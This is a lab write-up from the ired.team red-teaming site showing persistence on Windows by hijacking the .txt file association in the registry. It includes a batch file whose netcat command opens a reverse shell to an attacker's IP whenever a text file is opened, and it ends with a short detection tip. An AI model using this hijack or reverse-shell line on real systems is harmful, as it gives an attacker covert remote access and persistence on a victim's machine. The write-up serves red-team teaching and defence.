Red Teaming Experiments
Red Teaming Experiments
linkedin
github
@spotheplanet
patreon
What is ired.team?
Pinned
Pentesting Cheatsheets
Active Directory & Kerberos Abuse
offensive security
Red Team Infrastructure
Initial Access
Code Execution
Code & Process Injection
Defense Evasion
Enumeration and Discovery
Privilege Escalation
Credential Access & Dumping
Lateral Movement
Persistence
DLL Proxying for Persistence
Schtask
Service Execution
Sticky Keys
Create Account
AddMonitor()
NetSh Helper DLL
Abusing Windows Managent Instrumentation
Windows Logon Helper
Hijacking Default File Extension
Persisting in svchost.exe with a Service DLL
Modifying .lnk Shortcuts
Screensaver Hijack
Application Shimming
BITS Jobs
COM Hijacking
SIP & Trust Provider Hijacking
Hijacking Time Providers
Installing Root Certificate
Powershell Profile Persistence
RID Hijacking
Word Library Add-Ins
Office Templates
Exfiltration
reversing, forensics & misc
Windows / OS Internals
Cloud
Neo4j
Dump Virtual Box Memory
AES Encryption Using Crypto++ .lib in Visual Studio C++
Reversing Password Checking Routine
Powered by GitBook

Hijacking Default File Extension

When a .txt file is double clicked, it's opened with a notepad.exe. Windows knows that it needs to use notepad.exe for opening txt files, because the .txt extension (among many others) are mapped to applictions that can open those files in Windows registry located at Computer\HKEY_CLASSES_ROOT.

It's possible to hijack a file extension and make it execute a malicious application before the actual file is opened.

In this quick lab, I'm going to hijack the .txt extension - the victim user will still be able to open the original .txt file, but it will additionally fire a reverse shell back to the attacking system.

Execution

The .txt extension handler is defined in the below registry key:

Computer\HKEY_CLASSES_ROOT\txtfile\shell\open\command

Below shows that the command responsible for opening .txt files is notepad.exe %1, where %1 is the argument for notepad.exe, which specifies a file name the notepad should open:

Say, a target user has the file test.exe on his desktop with the below file contents:

Let's now create a malicious file that we want to be executed when the user attempts to open the benign file test.txt. For this lab, the malicious file is going to be a simple Windows batch file located in c:\tools\shell.cmd:

c:\tools\shell.cmd
start C:\tools\nc.exe 10.0.0.5 443 -e C:\Windows\System32\cmd.exe
start notepad.exe %1

Once executed, c:\tools\hell.cmd will launch a simple netcat reverse shell to the attacking system and also a notepad with the test.txt file as an argument.

We are now ready to hijack the .txt file extension by modifying the value data of Computer\HKEY_CLASSES_ROOT\txtfile\shell\open\command to c:\tools\shell.cmd %1 as shown below:

Demo

Opening the test.txt file by double clikcing it opens the file itself, but a reverse shell is thrown to the attacking system as well:

Detection

Defenders may want to monitor registry for file extension command changes, especially if the data field contains binaries located in unusual places.

References

Previous
Windows Logon Helper
Next
Persisting in svchost.exe with a Service DLL
Last updated 1 year ago
Contents
Execution
Demo
Detection
References